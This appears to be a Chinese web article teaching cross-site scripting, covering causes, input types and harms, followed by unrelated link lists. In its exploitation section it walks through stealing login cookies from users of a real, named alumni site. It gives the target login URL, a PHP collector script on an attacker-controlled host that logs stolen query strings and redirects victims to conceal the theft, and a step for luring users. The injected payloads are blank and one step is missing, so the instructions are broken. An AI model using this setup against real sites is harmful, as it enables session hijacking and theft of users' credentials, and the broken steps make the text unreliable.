【前言】
本文主要介紹跨站腳本執(zhí)行漏洞的成因，形式，危害，利用方式，隱藏技巧，解決方法和常見問題 （FAQ），由于目前介紹跨站腳本執(zhí)行漏洞的資料還不是很多，而且一般也不是很詳細(xì)，所以希望本文能夠 比較詳細(xì)的介紹該漏洞 。由于時間倉促，水平有限，本文可能有不少錯誤，希望大家不吝賜教 。
聲明，請不要利用本文介紹的任何內(nèi)容，代碼或方法進(jìn)行破壞，否則一切后果自負(fù)！
【漏洞成因】
原因很簡單，就是因為CGI程序沒有對用戶提交的變量中的HTML代碼進(jìn)行過濾或轉(zhuǎn)換 。
【漏洞形式】
這里所說的形式，實際上是指CGI輸入的形式，主要分為兩種：
1．顯示輸入
2．隱式輸入
其中顯示輸入明確要求用戶輸入數(shù)據(jù)，而隱式輸入則本來并不要求用戶輸入數(shù)據(jù)，但是用戶卻可以通 過輸入數(shù)據(jù)來進(jìn)行干涉 。
顯示輸入又可以分為兩種：
1． 輸入完成立刻輸出結(jié)果
2． 輸入完成先存儲在文本文件或數(shù)據(jù)庫中，然后再輸出結(jié)果
注意：后者可能會讓你的網(wǎng)站面目全非?。海?
而隱式輸入除了一些正常的情況外，還可以利用服務(wù)器或CGI程序處理錯誤信息的方式來實施 。
【漏洞危害】
大家最關(guān)心的大概就要算這個問題了，下面列舉的可能并不全面，也不系統(tǒng)，但是我想應(yīng)該是比較典 型的吧 。
1． 獲取其他用戶Cookie中的敏感數(shù)據(jù)
2． 屏蔽頁面特定信息
3． 偽造頁面信息
4． 拒絕服務(wù)攻擊
5． 突破外網(wǎng)內(nèi)網(wǎng)不同安全設(shè)置
6． 與其它漏洞結(jié)合，修改系統(tǒng)設(shè)置，查看系統(tǒng)文件，執(zhí)行系統(tǒng)命令等
7． 其它
一般來說，上面的危害還經(jīng)常伴隨著頁面變形的情況 。而所謂跨站腳本執(zhí)行漏洞，也就是通過別人的 網(wǎng)站達(dá)到攻擊的效果，也就是說，這種攻擊能在一定程度上隱藏身份 。
【利用方式】
下面我們將通過具體例子來演示上面的各種危害，這樣應(yīng)該更能說明問題，而且更易于理解 。為了條 理更清晰一些，我們將針對每種危害做一個實驗 。
為了做好這些實驗，我們需要一個抓包軟件，我使用的是Iris，當(dāng)然你可以選擇其它的軟件，比如 NetXray什么的 。至于具體的使用方法，請參考相關(guān)幫助或手冊 。
另外，需要明白的一點就是：只要服務(wù)器返回用戶提交的信息，就可能存在跨站腳本執(zhí)行漏洞 。
好的，一切就緒，我們開始做實驗?。海?
實驗一：獲取其他用戶Cookie中的敏感信息
我們以國內(nèi)著名的同學(xué)錄站點5460.net為例來說明一下，請按照下面的步驟進(jìn)行：
1． 進(jìn)入首頁http://www.5460.net/
2． 輸入用戶名“”，提交，發(fā)現(xiàn)服務(wù)器返回信息中包含了用戶提交的“” 。
3． 分析抓包數(shù)據(jù)，得到實際請求：
http://www.5460.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6
4． 構(gòu)造一個提交，目標(biāo)是能夠顯示用戶Cookie信息：
http://www.5460.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6
其中http://www.notfound.org/info.php是你能夠控制的某臺主機(jī)上的一個腳本，功能是獲取查詢字符串的信 息，內(nèi)容如下：
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
header("Location: http://www.5460.net");
注：“ ”為“ ”的URL編碼，并且這里只能用“ ”，因為“ ”將被作為空格處理 。后面的header語 句則純粹是為了增加隱蔽性 。
6． 如果上面的URL能夠正確運行的話，下一步就是誘使登陸5460.net的用戶訪問該URL，而我們就可以 獲取該用戶Cookie中的敏感信息 。

推薦閱讀

• 

  紅米note4可以升級miui11嗎
• 

  簡單辦法解決無原裝充電器的問題
• 

  領(lǐng)克02機(jī)械鑰匙在哪
• 

  朝花夕拾簡介 朝花夕拾原名
• 

  在職的研究生有用嗎
• 

  16GB+256GB+2億像素，發(fā)布僅五個月跌至2799元，官方承諾四年不卡
• 

  微信支付密碼怎么改新密碼，微信支付密碼忘記了怎么辦？
• 

  烤地瓜與蒸地瓜的區(qū)別?
• 

  水壺用白醋洗了的危害
• 

  車標(biāo)是一條橫杠是什么車
• 

  開天辟地第一回，破3底層升級android 10
• 

  在新的歷史條件下開展勞動教育機(jī)遇與挑戰(zhàn)分別是什么
• 

  從前有座靈劍山電視劇結(jié)局是什么
• 

  海信電視3A和3D的區(qū)別 海信電視3A和3D的區(qū)別是什么
• 

  教你酷米客公交設(shè)置上下班路線的具體操作流程。
• 

  我來分享oppo reno z創(chuàng)建兩個微信的詳細(xì)操作流程。

• 防范腳本入侵
• 銀行被列為被執(zhí)行人是什么意思
• 強(qiáng)制執(zhí)行不付錢判刑嗎
• Vanilla論壇程序中的多個HTML注入及跨站腳本漏洞
• 強(qiáng)制執(zhí)行公證的效力怎樣
• 恢復(fù)執(zhí)行申請申請人需要簽字嗎
• ARP靜態(tài)綁定批處理文件腳本詳細(xì)解讀
• 代理腳本病毒利用漏洞傳播病毒 下載網(wǎng)游木馬
• 利用系統(tǒng)漏洞傳播腳本病毒 偽顆粒竊取玩家信息
• 判決下來多久執(zhí)行